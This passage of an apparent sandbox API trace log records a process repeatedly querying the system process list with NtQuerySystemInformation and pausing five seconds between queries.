RegionSize=0xdea64*=0x10000) returned 0x0 [0188.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0188.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.582] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0188.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.763] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0188.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.922] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0189.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.148] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0189.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.262] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0189.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.421] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0189.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.589] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0189.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.802] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0189.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.977] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0190.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0190.105] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0190.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0190.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0190.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0190.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0190.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0190.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0190.241] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0190.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0190.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0190.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0190.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0190.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0190.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0190.367] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0190.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0190.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0190.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0190.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0190.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0190.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0190.489] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0190.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0190.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0190.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0190.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0190.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0190.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0190.598] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0190.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0190.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0190.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0190.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0190.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0191.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.065] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x170000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x170000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0191.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x170000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.222] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x180000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x180000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x180000, ResultLength=0x0) returned 0xc0000004 [0191.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x180000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0191.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.518] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0191.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0191.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.761] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0191.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0191.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0191.975] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0191.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0191.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0191.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0191.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0191.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0192.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0192.381] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0192.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0192.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0192.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0192.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0192.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0192.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0192.562] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0192.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, 